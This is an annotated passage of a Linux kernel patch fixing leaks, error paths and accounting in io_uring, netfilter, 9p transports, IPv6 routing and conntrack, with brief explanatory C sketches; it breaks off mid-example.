++enum uvc_transfer_characteristics_values {
++	UVC_TRANSFER_CHARACTERISTICS_UNSPECIFIED,
++	UVC_TRANSFER_CHARACTERISTICS_BT_709,
++	UVC_TRANSFER_CHARACTERISTICS_BT_470_2_M,
++	UVC_TRANSFER_CHARACTERISTICS_BT_470_2_B_G,
++	UVC_TRANSFER_CHARACTERISTICS_SMPTE_170M,
++	UVC_TRANSFER_CHARACTERISTICS_SMPTE_240M,
++	UVC_TRANSFER_CHARACTERISTICS_LINEAR,
++	UVC_TRANSFER_CHARACTERISTICS_SRGB,
++};
++
++enum uvc_matrix_coefficients {
++	UVC_MATRIX_COEFFICIENTS_UNSPECIFIED,
++	UVC_MATRIX_COEFFICIENTS_BT_709,
++	UVC_MATRIX_COEFFICIENTS_FCC,
++	UVC_MATRIX_COEFFICIENTS_BT_470_2_B_G,
++	UVC_MATRIX_COEFFICIENTS_SMPTE_170M,
++	UVC_MATRIX_COEFFICIENTS_SMPTE_240M,
++};
++
+ /* ------------------------------------------------------------------------
+  * UVC structures
+  */
+diff --git a/include/uapi/linux/uvcvideo.h b/include/uapi/linux/uvcvideo.h
+index 8288137387c0d..a9d0a64007ba5 100644
+--- a/include/uapi/linux/uvcvideo.h
++++ b/include/uapi/linux/uvcvideo.h
+@@ -86,7 +86,7 @@ struct uvc_xu_control_query {
+  * struct. The first two fields are added by the driver, they can be used for
+  * clock synchronisation. The rest is an exact copy of a UVC payload header.
+  * Only complete objects with complete buffers are included. Therefore it's
+- * always sizeof(meta->ts) + sizeof(meta->sof) + meta->length bytes large.
++ * always sizeof(meta->ns) + sizeof(meta->sof) + meta->length bytes large.
+  */
+ struct uvc_meta_buf {
+ 	__u64 ns;
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index e2c46889d5fab..746b137b96e9b 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -509,7 +509,7 @@ int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
+ 	}
+ 
+ 	pages = io_pin_pages(reg.ring_addr,
+-			     struct_size(br, bufs, reg.ring_entries),
++			     flex_array_size(br, bufs, reg.ring_entries),
+ 			     &nr_pages);
+ 	if (IS_ERR(pages)) {
+ 		kfree(free_bl);
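The kbuf fix narrows the pinned size from struct_size() to flex_array_size(): the provided-buffer ring's header overlays the first array element through a union, so the memory userspace registered is exactly ring_entries * sizeof(struct io_uring_buf), and adding sizeof(*br) on top could pin one page too many. The difference in miniature (simplified layout using a GNU zero-length array, mirroring how the header aliases bufs[0]):

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct buf { uint64_t addr; uint32_t len, bid; };

struct ring {
	union {
		struct { uint64_t resv; uint32_t resv2, tail; };
		struct buf bufs[0];	/* header aliases bufs[0] */
	};
};

int main(void)
{
	size_t n = 8;
	size_t struct_size_style = sizeof(struct ring) + n * sizeof(struct buf);
	size_t flex_array_style = n * sizeof(struct buf);

	printf("struct_size: %zu, flex_array_size: %zu\n",
	       struct_size_style, flex_array_style);	/* 144 vs 128 */
	return 0;
}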
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 55d822beaf084..4fdc2770bbe44 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -126,13 +126,15 @@ static struct io_async_msghdr *io_msg_alloc_async(struct io_kiocb *req,
+ 	struct io_cache_entry *entry;
+ 	struct io_async_msghdr *hdr;
+ 
+-	if (!(issue_flags & IO_URING_F_UNLOCKED) &&
+-	    (entry = io_alloc_cache_get(&ctx->netmsg_cache)) != NULL) {
+-		hdr = container_of(entry, struct io_async_msghdr, cache);
+-		hdr->free_iov = NULL;
+-		req->flags |= REQ_F_ASYNC_DATA;
+-		req->async_data = hdr;
+-		return hdr;
++	if (!(issue_flags & IO_URING_F_UNLOCKED)) {
++		entry = io_alloc_cache_get(&ctx->netmsg_cache);
++		if (entry) {
++			hdr = container_of(entry, struct io_async_msghdr, cache);
++			hdr->free_iov = NULL;
++			req->flags |= REQ_F_ASYNC_DATA;
++			req->async_data = hdr;
++			return hdr;
++		}
+ 	}
+ 
+ 	if (!io_alloc_async_data(req)) {
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index ab5ae475840f4..56dbd1863c785 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -668,6 +668,14 @@ static void io_async_queue_proc(struct file *file, struct wait_queue_head *head,
+ 	__io_queue_proc(&apoll->poll, pt, head, &apoll->double_poll);
+ }
+ 
++/*
++ * We can't reliably detect loops where a poll triggers repeatedly and the
++ * subsequent issue attempt keeps failing. But rather than fail these
++ * immediately, allow a certain number of retries before we give up. Given
++ * that this condition should _rarely_ trigger even once, we should be fine
++ * with a larger value.
++ */
++#define APOLL_MAX_RETRY		128
++
+ static struct async_poll *io_req_alloc_apoll(struct io_kiocb *req,
+ 					     unsigned issue_flags)
+ {
+@@ -678,16 +686,23 @@ static struct async_poll *io_req_alloc_apoll(struct io_kiocb *req,
+ 	if (req->flags & REQ_F_POLLED) {
+ 		apoll = req->apoll;
+ 		kfree(apoll->double_poll);
+-	} else if (!(issue_flags & IO_URING_F_UNLOCKED) &&
+-		   (entry = io_alloc_cache_get(&ctx->apoll_cache)) != NULL) {
++	} else if (!(issue_flags & IO_URING_F_UNLOCKED)) {
++		entry = io_alloc_cache_get(&ctx->apoll_cache);
++		if (entry == NULL)
++			goto alloc_apoll;
+ 		apoll = container_of(entry, struct async_poll, cache);
++		apoll->poll.retries = APOLL_MAX_RETRY;
+ 	} else {
++alloc_apoll:
+ 		apoll = kmalloc(sizeof(*apoll), GFP_ATOMIC);
+ 		if (unlikely(!apoll))
+ 			return NULL;
++		apoll->poll.retries = APOLL_MAX_RETRY;
+ 	}
+ 	apoll->double_poll = NULL;
+ 	req->apoll = apoll;
++	if (unlikely(!--apoll->poll.retries))
++		return NULL;
+ 	return apoll;
+ }
+ 
+@@ -709,8 +724,6 @@ int io_arm_poll_handler(struct io_kiocb *req, unsigned issue_flags)
+ 		return IO_APOLL_ABORTED;
+ 	if (!file_can_poll(req->file))
+ 		return IO_APOLL_ABORTED;
+-	if ((req->flags & (REQ_F_POLLED|REQ_F_PARTIAL_IO)) == REQ_F_POLLED)
+-		return IO_APOLL_ABORTED;
+ 	if (!(req->flags & REQ_F_APOLL_MULTISHOT))
+ 		mask |= EPOLLONESHOT;
+ 
+diff --git a/io_uring/poll.h b/io_uring/poll.h
+index 5f3bae50fc81a..b2393b403a2c2 100644
+--- a/io_uring/poll.h
++++ b/io_uring/poll.h
+@@ -12,6 +12,7 @@ struct io_poll {
+ 	struct file			*file;
+ 	struct wait_queue_head		*head;
+ 	__poll_t			events;
++	int				retries;
+ 	struct wait_queue_entry		wait;
+ };
+ 
+diff --git a/kernel/fail_function.c b/kernel/fail_function.c
+index a7ccd2930c5f4..d971a01893197 100644
+--- a/kernel/fail_function.c
++++ b/kernel/fail_function.c
+@@ -163,10 +163,7 @@ static void fei_debugfs_add_attr(struct fei_attr *attr)
+ 
+ static void fei_debugfs_remove_attr(struct fei_attr *attr)
+ {
+-	struct dentry *dir;
+-
+-	dir = debugfs_lookup(attr->kp.symbol_name, fei_debugfs_dir);
+-	debugfs_remove_recursive(dir);
++	debugfs_lookup_and_remove(attr->kp.symbol_name, fei_debugfs_dir);
+ }
+ 
+ static int fei_kprobe_handler(struct kprobe *kp, struct pt_regs *regs)
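This fail_function change (and the identical printk/index.c one below) replaces a debugfs_lookup() + debugfs_remove() pair with debugfs_lookup_and_remove(). The motivation is refcounting: debugfs_lookup() returns a dentry with an elevated reference that the old pairing never dropped. The helper behaves roughly like this open-coded sketch:

	struct dentry *dentry = debugfs_lookup(name, parent);

	if (dentry) {
		debugfs_remove(dentry);	/* removal is recursive */
		dput(dentry);		/* drop the reference lookup took */
	}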
+diff --git a/kernel/irq/ipi.c b/kernel/irq/ipi.c
+index bbd945bacef08..961d4af76af37 100644
+--- a/kernel/irq/ipi.c
++++ b/kernel/irq/ipi.c
+@@ -188,9 +188,9 @@ EXPORT_SYMBOL_GPL(ipi_get_hwirq);
+ static int ipi_send_verify(struct irq_chip *chip, struct irq_data *data,
+ 			   const struct cpumask *dest, unsigned int cpu)
+ {
+-	const struct cpumask *ipimask = irq_data_get_affinity_mask(data);
++	const struct cpumask *ipimask;
+ 
+-	if (!chip || !ipimask)
++	if (!chip || !data)
+ 		return -EINVAL;
+ 
+ 	if (!chip->ipi_send_single && !chip->ipi_send_mask)
+@@ -199,6 +199,10 @@ static int ipi_send_verify(struct irq_chip *chip, struct irq_data *data,
+ 	if (cpu >= nr_cpu_ids)
+ 		return -EINVAL;
+ 
++	ipimask = irq_data_get_affinity_mask(data);
++	if (!ipimask)
++		return -EINVAL;
++
+ 	if (dest) {
+ 		if (!cpumask_subset(dest, ipimask))
+ 			return -EINVAL;
+diff --git a/kernel/printk/index.c b/kernel/printk/index.c
+index c85be186a7832..a6b27526baaf6 100644
+--- a/kernel/printk/index.c
++++ b/kernel/printk/index.c
+@@ -145,7 +145,7 @@ static void pi_create_file(struct module *mod)
+ #ifdef CONFIG_MODULES
+ static void pi_remove_file(struct module *mod)
+ {
+-	debugfs_remove(debugfs_lookup(pi_get_module_name(mod), dfs_index));
++	debugfs_lookup_and_remove(pi_get_module_name(mod), dfs_index);
+ }
+ 
+ static int pi_module_notify(struct notifier_block *nb, unsigned long op,
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c35e08b74014f..361bd8beafdff 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -5588,11 +5588,16 @@ EXPORT_SYMBOL_GPL(ring_buffer_alloc_read_page);
+  */
+ void ring_buffer_free_read_page(struct trace_buffer *buffer, int cpu, void *data)
+ {
+-	struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
++	struct ring_buffer_per_cpu *cpu_buffer;
+ 	struct buffer_data_page *bpage = data;
+ 	struct page *page = virt_to_page(bpage);
+ 	unsigned long flags;
+ 
++	if (!buffer || !buffer->buffers || !buffer->buffers[cpu])
++		return;
++
++	cpu_buffer = buffer->buffers[cpu];
++
+ 	/* If the page is still in use someplace else, we can't reuse it */
+ 	if (page_ref_count(page) > 1)
+ 		goto out;
+diff --git a/net/9p/trans_rdma.c b/net/9p/trans_rdma.c
+index e9a830c69058c..29a9292303ea3 100644
+--- a/net/9p/trans_rdma.c
++++ b/net/9p/trans_rdma.c
+@@ -386,6 +386,7 @@ post_recv(struct p9_client *client, struct p9_rdma_context *c)
+ 	struct p9_trans_rdma *rdma = client->trans;
+ 	struct ib_recv_wr wr;
+ 	struct ib_sge sge;
++	int ret;
+ 
+ 	c->busa = ib_dma_map_single(rdma->cm_id->device,
+ 				    c->rc.sdata, client->msize,
+@@ -403,7 +404,12 @@ post_recv(struct p9_client *client, struct p9_rdma_context *c)
+ 	wr.wr_cqe = &c->cqe;
+ 	wr.sg_list = &sge;
+ 	wr.num_sge = 1;
+-	return ib_post_recv(rdma->qp, &wr, NULL);
++
++	ret = ib_post_recv(rdma->qp, &wr, NULL);
++	if (ret)
++		ib_dma_unmap_single(rdma->cm_id->device, c->busa,
++				    client->msize, DMA_FROM_DEVICE);
++	return ret;
+ 
+  error:
+ 	p9_debug(P9_DEBUG_ERROR, "EIO\n");
+@@ -500,7 +506,7 @@ dont_need_post_recv:
+ 
+ 	if (down_interruptible(&rdma->sq_sem)) {
+ 		err = -EINTR;
+-		goto send_error;
++		goto dma_unmap;
+ 	}
+ 
+ 	/* Mark request as `sent' *before* we actually send it,
+@@ -510,11 +516,14 @@ dont_need_post_recv:
+ 	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ 	err = ib_post_send(rdma->qp, &wr, NULL);
+ 	if (err)
+-		goto send_error;
++		goto dma_unmap;
+ 
+ 	/* Success */
+ 	return 0;
+ 
++dma_unmap:
++	ib_dma_unmap_single(rdma->cm_id->device, c->busa,
++			    c->req->tc.size, DMA_TO_DEVICE);
+  /* Handle errors that happened during or while preparing the send: */
+  send_error:
+ 	WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index cf1b89ba522b4..75c03a82baf38 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -371,19 +371,24 @@ out:
+ 	return ret;
+ }
+ 
+-static int xen_9pfs_front_probe(struct xenbus_device *dev,
+-				const struct xenbus_device_id *id)
++static int xen_9pfs_front_init(struct xenbus_device *dev)
+ {
+ 	int ret, i;
+ 	struct xenbus_transaction xbt;
+-	struct xen_9pfs_front_priv *priv = NULL;
+-	char *versions;
++	struct xen_9pfs_front_priv *priv = dev_get_drvdata(&dev->dev);
++	char *versions, *v;
+ 	unsigned int max_rings, max_ring_order, len = 0;
+ 
+ 	versions = xenbus_read(XBT_NIL, dev->otherend, "versions", &len);
+ 	if (IS_ERR(versions))
+ 		return PTR_ERR(versions);
+-	if (strcmp(versions, "1")) {
++	for (v = versions; *v; v++) {
++		if (simple_strtoul(v, &v, 10) == 1) {
++			v = NULL;
++			break;
++		}
++	}
++	if (v) {
+ 		kfree(versions);
+ 		return -EINVAL;
+ 	}
+@@ -398,11 +403,6 @@ static int xen_9pfs_front_probe(struct xenbus_device *dev,
+ 	if (p9_xen_trans.maxsize > XEN_FLEX_RING_SIZE(max_ring_order))
+ 		p9_xen_trans.maxsize = XEN_FLEX_RING_SIZE(max_ring_order) / 2;
+ 
+-	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
+-
+-	priv->dev = dev;
+ 	priv->num_rings = XEN_9PFS_NUM_RINGS;
+ 	priv->rings = kcalloc(priv->num_rings, sizeof(*priv->rings),
+ 			      GFP_KERNEL);
+@@ -461,23 +461,35 @@ static int xen_9pfs_front_probe(struct xenbus_device *dev,
+ 		goto error;
+ 	}
+ 
+-	write_lock(&xen_9pfs_lock);
+-	list_add_tail(&priv->list, &xen_9pfs_devs);
+-	write_unlock(&xen_9pfs_lock);
+-	dev_set_drvdata(&dev->dev, priv);
+-	xenbus_switch_state(dev, XenbusStateInitialised);
+-
+ 	return 0;
+ 
+  error_xenbus:
+ 	xenbus_transaction_end(xbt, 1);
+ 	xenbus_dev_fatal(dev, ret, "writing xenstore");
+  error:
+-	dev_set_drvdata(&dev->dev, NULL);
+ 	xen_9pfs_front_free(priv);
+ 	return ret;
+ }
+ 
++static int xen_9pfs_front_probe(struct xenbus_device *dev,
++				const struct xenbus_device_id *id)
++{
++	struct xen_9pfs_front_priv *priv = NULL;
++
++	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
++	if (!priv)
++		return -ENOMEM;
++
++	priv->dev = dev;
++	dev_set_drvdata(&dev->dev, priv);
++
++	write_lock(&xen_9pfs_lock);
++	list_add_tail(&priv->list, &xen_9pfs_devs);
++	write_unlock(&xen_9pfs_lock);
++
++	return 0;
++}
++
+ static int xen_9pfs_front_resume(struct xenbus_device *dev)
+ {
+ 	dev_warn(&dev->dev, "suspend/resume unsupported\n");
+@@ -496,6 +508,8 @@ static void xen_9pfs_front_changed(struct xenbus_device *dev,
+ 		break;
+ 
+ 	case XenbusStateInitWait:
++		if (!xen_9pfs_front_init(dev))
++			xenbus_switch_state(dev, XenbusStateInitialised);
+ 		break;
+ 
+ 	case XenbusStateConnected:
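Besides splitting initialization out of probe, xen_9pfs_front_init() now scans the backend's "versions" string for any token equal to 1 rather than requiring the whole string to be exactly "1", so a backend advertising e.g. "1 2" is no longer rejected. A userspace analogue of the scan (hypothetical helper):

#include <stdio.h>
#include <stdlib.h>

static int supports_v1(const char *versions)
{
	const char *v;
	char *end;

	for (v = versions; *v; v++) {
		if (strtoul(v, &end, 10) == 1 && end != v)
			return 1;
		if (end != v)
			v = end - 1;	/* jump past the parsed number */
	}
	return 0;
}

int main(void)
{
	printf("%d %d %d\n", supports_v1("1"),
	       supports_v1("2 1"), supports_v1("2"));	/* 1 1 0 */
	return 0;
}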
+diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c
+index ce5dfa3babd26..757ec46fc45a0 100644
+--- a/net/bridge/netfilter/ebtables.c
++++ b/net/bridge/netfilter/ebtables.c
+@@ -1090,7 +1090,7 @@ static int do_replace_finish(struct net *net, struct ebt_replace *repl,
+ 
+ 	audit_log_nfcfg(repl->name, AF_BRIDGE, repl->nentries,
+ 			AUDIT_XT_OP_REPLACE, GFP_KERNEL);
+-	return ret;
++	return 0;
+ 
+ free_unlock:
+ 	mutex_unlock(&ebt_mutex);
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 7a2a4650a8988..24eae99dfe05a 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3146,8 +3146,10 @@ void __dev_kfree_skb_any(struct sk_buff *skb, enum skb_free_reason reason)
+ {
+ 	if (in_hardirq() || irqs_disabled())
+ 		__dev_kfree_skb_irq(skb, reason);
++	else if (unlikely(reason == SKB_REASON_DROPPED))
++		kfree_skb(skb);
+ 	else
+-		dev_kfree_skb(skb);
++		consume_skb(skb);
+ }
+ EXPORT_SYMBOL(__dev_kfree_skb_any);
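The __dev_kfree_skb_any() change is about drop accounting, not memory: kfree_skb() and consume_skb() both free the skb, but only kfree_skb() reports an abnormal drop (feeding the skb:kfree_skb tracepoint and drop monitors). With the fix, skbs freed for SKB_REASON_DROPPED show up as drops while normally completed ones do not. The usage shape:

	if (unlikely(dropped))
		kfree_skb(skb);		/* counted as a packet drop */
	else
		consume_skb(skb);	/* normal end of life, not a drop */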
+ 
+diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
+index ffc0cab7cf189..2407066b0fec1 100644
+--- a/net/ipv4/netfilter/arp_tables.c
++++ b/net/ipv4/netfilter/arp_tables.c
+@@ -1525,6 +1525,10 @@ int arpt_register_table(struct net *net,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct arpt_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
+index 2ed7c58b471ac..da5998011ab9b 100644
+--- a/net/ipv4/netfilter/ip_tables.c
++++ b/net/ipv4/netfilter/ip_tables.c
+@@ -1045,7 +1045,6 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 	struct xt_counters *counters;
+ 	struct ipt_entry *iter;
+ 
+-	ret = 0;
+ 	counters = xt_counters_alloc(num_counters);
+ 	if (!counters) {
+ 		ret = -ENOMEM;
+@@ -1091,7 +1090,7 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 		net_warn_ratelimited("iptables: counters copy to user failed while replacing table\n");
+ 	}
+ 	vfree(counters);
+-	return ret;
++	return 0;
+ 
+  put_module:
+ 	module_put(t->me);
+@@ -1742,6 +1741,10 @@ int ipt_register_table(struct net *net, const struct xt_table *table,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct ipt_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index c375f603a16cf..7f37e7da64671 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -580,6 +580,9 @@ EXPORT_SYMBOL(tcp_create_openreq_child);
+  * validation and inside tcp_v4_reqsk_send_ack(). Can we do better?
+  *
+  * We don't need to initialize tmp_opt.sack_ok as we don't use the results
++ *
++ * Note: If @fastopen is true, this can be called from process context.
++ *       Otherwise, this is from BH context.
+  */
+ 
+ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+@@ -731,7 +734,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 					  &tcp_rsk(req)->last_oow_ack_time))
+ 			req->rsk_ops->send_ack(sk, skb, req);
+ 		if (paws_reject)
+-			__NET_INC_STATS(sock_net(sk), LINUX_MIB_PAWSESTABREJECTED);
++			NET_INC_STATS(sock_net(sk), LINUX_MIB_PAWSESTABREJECTED);
+ 		return NULL;
+ 	}
+ 
+@@ -750,7 +753,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 	 *	   "fourth, check the SYN bit"
+ 	 */
+ 	if (flg & (TCP_FLAG_RST|TCP_FLAG_SYN)) {
+-		__TCP_INC_STATS(sock_net(sk), TCP_MIB_ATTEMPTFAILS);
++		TCP_INC_STATS(sock_net(sk), TCP_MIB_ATTEMPTFAILS);
+ 		goto embryonic_reset;
+ 	}
+ 
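
The stats change pairs with the new comment above it: the double-underscore helpers assume BH (softirq) context and do an unprotected per-CPU increment, while the plain-named ones remain correct when the caller may be preempted, which tcp_check_req() now can be on the Fast Open path. A loose userspace analog, using an atomic for the "safe from any context" flavor (the kernel mechanism differs):

    #include <stdatomic.h>
    #include <stdio.h>

    static unsigned long stat_bh_only;          /* needs caller exclusion */
    static _Atomic unsigned long stat_anywhere; /* safe without it */

    static void inc_bh_only(void)  { stat_bh_only++; }  /* ~__NET_INC_STATS */
    static void inc_anywhere(void)                      /* ~NET_INC_STATS */
    {
        atomic_fetch_add(&stat_anywhere, 1);
    }

    int main(void)
    {
        inc_bh_only();
        inc_anywhere();
        printf("%lu %lu\n", stat_bh_only,
               (unsigned long)atomic_load(&stat_anywhere));
        return 0;
    }
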
+diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
+index 2d816277f2c5a..0ce0ed17c7583 100644
+--- a/net/ipv6/netfilter/ip6_tables.c
++++ b/net/ipv6/netfilter/ip6_tables.c
+@@ -1062,7 +1062,6 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 	struct xt_counters *counters;
+ 	struct ip6t_entry *iter;
+ 
+-	ret = 0;
+ 	counters = xt_counters_alloc(num_counters);
+ 	if (!counters) {
+ 		ret = -ENOMEM;
+@@ -1108,7 +1107,7 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 		net_warn_ratelimited("ip6tables: counters copy to user failed while replacing table\n");
+ 	}
+ 	vfree(counters);
+-	return ret;
++	return 0;
+ 
+  put_module:
+ 	module_put(t->me);
+@@ -1751,6 +1750,10 @@ int ip6t_register_table(struct net *net, const struct xt_table *table,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct ip6t_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv6/netfilter/ip6t_rpfilter.c b/net/ipv6/netfilter/ip6t_rpfilter.c
+index a01d9b842bd07..67c87a88cde4f 100644
+--- a/net/ipv6/netfilter/ip6t_rpfilter.c
++++ b/net/ipv6/netfilter/ip6t_rpfilter.c
+@@ -72,7 +72,9 @@ static bool rpfilter_lookup_reverse6(struct net *net, const struct sk_buff *skb,
+ 		goto out;
+ 	}
+ 
+-	if (rt->rt6i_idev->dev == dev || (flags & XT_RPFILTER_LOOSE))
++	if (rt->rt6i_idev->dev == dev ||
++	    l3mdev_master_ifindex_rcu(rt->rt6i_idev->dev) == dev->ifindex ||
++	    (flags & XT_RPFILTER_LOOSE))
+ 		ret = true;
+  out:
+ 	ip6_rt_put(rt);
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 2f355f0ec32ac..0b060cb8681f0 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -5540,16 +5540,17 @@ static size_t rt6_nlmsg_size(struct fib6_info *f6i)
+ 		nexthop_for_each_fib6_nh(f6i->nh, rt6_nh_nlmsg_size,
+ 					 &nexthop_len);
+ 	} else {
++		struct fib6_info *sibling, *next_sibling;
+ 		struct fib6_nh *nh = f6i->fib6_nh;
+ 
+ 		nexthop_len = 0;
+ 		if (f6i->fib6_nsiblings) {
+-			nexthop_len = nla_total_size(0)	 /* RTA_MULTIPATH */
+-				    + NLA_ALIGN(sizeof(struct rtnexthop))
+-				    + nla_total_size(16) /* RTA_GATEWAY */
+-				    + lwtunnel_get_encap_size(nh->fib_nh_lws);
++			rt6_nh_nlmsg_size(nh, &nexthop_len);
+ 
+-			nexthop_len *= f6i->fib6_nsiblings;
++			list_for_each_entry_safe(sibling, next_sibling,
++						 &f6i->fib6_siblings, fib6_siblings) {
++				rt6_nh_nlmsg_size(sibling->fib6_nh, &nexthop_len);
++			}
+ 		}
+ 		nexthop_len += lwtunnel_get_encap_size(nh->fib_nh_lws);
+ 	}
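
The rt6_nlmsg_size() fix replaces "size of the first nexthop times the sibling count" with a per-sibling sum, since each sibling route can carry a differently sized lightweight-tunnel encap. The general shape, sketched with made-up sizes:

    #include <stdio.h>
    #include <stddef.h>

    struct nh { size_t encap_size; };

    static size_t nh_msg_size(const struct nh *nh)
    {
        return 8 /* rtnexthop */ + 16 /* gateway */ + nh->encap_size;
    }

    /* sum each nexthop individually; multiplying the first one's size
     * by the count (the old code) under-counts when encap sizes differ */
    static size_t route_msg_size(const struct nh *nhs, int n)
    {
        size_t total = 0;

        for (int i = 0; i < n; i++)
            total += nh_msg_size(&nhs[i]);
        return total;
    }

    int main(void)
    {
        struct nh nhs[2] = { { .encap_size = 0 }, { .encap_size = 24 } };

        printf("%zu\n", route_msg_size(nhs, 2)); /* 72, not 2 * 24 */
        return 0;
    }
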
+diff --git a/net/netfilter/core.c b/net/netfilter/core.c
+index 5a6705a0e4ecf..6e80f0f6149ea 100644
+--- a/net/netfilter/core.c
++++ b/net/netfilter/core.c
+@@ -669,6 +669,9 @@ const struct nf_ct_hook __rcu *nf_ct_hook __read_mostly;
+ EXPORT_SYMBOL_GPL(nf_ct_hook);
+ 
+ #if IS_ENABLED(CONFIG_NF_CONNTRACK)
++u8 nf_ctnetlink_has_listener;
++EXPORT_SYMBOL_GPL(nf_ctnetlink_has_listener);
++
+ const struct nf_nat_hook __rcu *nf_nat_hook __read_mostly;
+ EXPORT_SYMBOL_GPL(nf_nat_hook);
+ 
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index 8639e7efd0e22..adae86e8e02e8 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -384,7 +384,6 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
+-	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+ 		nf_conntrack_free(nfct);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 23b3fedd619a5..7f0f3bcaae031 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -890,10 +890,8 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 
+ 	zone = nf_ct_zone(ct);
+ 
+-	if (!nf_ct_ext_valid_pre(ct->ext)) {
+-		NF_CT_STAT_INC_ATOMIC(net, insert_failed);
+-		return -ETIMEDOUT;
+-	}
++	if (!nf_ct_ext_valid_pre(ct->ext))
++		return -EAGAIN;
+ 
+ 	local_bh_disable();
+ 	do {
+@@ -928,6 +926,19 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 			goto chaintoolong;
+ 	}
+ 
++	/* If genid has changed, we can't insert anymore because ct
++	 * extensions could have stale pointers and nf_ct_iterate_destroy
++	 * might have completed its table scan already.
++	 *
++	 * Increment of the ext genid right after this check is fine:
++	 * nf_ct_iterate_destroy blocks until locks are released.
++	 */
++	if (!nf_ct_ext_valid_post(ct->ext)) {
++		err = -EAGAIN;
++		goto out;
++	}
++
++	ct->status |= IPS_CONFIRMED;
+ 	smp_wmb();
+ 	/* The caller holds a reference to this object */
+ 	refcount_set(&ct->ct_general.use, 2);
+@@ -936,12 +947,6 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 	NF_CT_STAT_INC(net, insert);
+ 	local_bh_enable();
+ 
+-	if (!nf_ct_ext_valid_post(ct->ext)) {
+-		nf_ct_kill(ct);
+-		NF_CT_STAT_INC_ATOMIC(net, drop);
+-		return -ETIMEDOUT;
+-	}
+-
+ 	return 0;
+ chaintoolong:
+ 	NF_CT_STAT_INC(net, chaintoolong);
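
The conntrack insert now re-validates the extension generation id under the lock and only then sets IPS_CONFIRMED, returning -EAGAIN so callers can rebuild the entry instead of killing a half-published one. A simplified sketch of that check-then-publish pattern (the kernel's genid machinery is more involved):

    #include <errno.h>
    #include <stdatomic.h>
    #include <stdbool.h>
    #include <stdio.h>

    static _Atomic unsigned int genid; /* bumped by "flush everything" events */

    struct obj {
        unsigned int gen;  /* generation the object was built against */
        bool confirmed;
    };

    static int publish(struct obj *o)
    {
        /* cheap pre-check outside the lock */
        if (o->gen != atomic_load(&genid))
            return -EAGAIN;

        /* ... take the hash lock, find the slot ... */

        /* re-check under the lock: a concurrent flush may have bumped
         * the generation after the pre-check ran */
        if (o->gen != atomic_load(&genid))
            return -EAGAIN;

        o->confirmed = true; /* only now mark it live (IPS_CONFIRMED) */
        return 0;
    }

    int main(void)
    {
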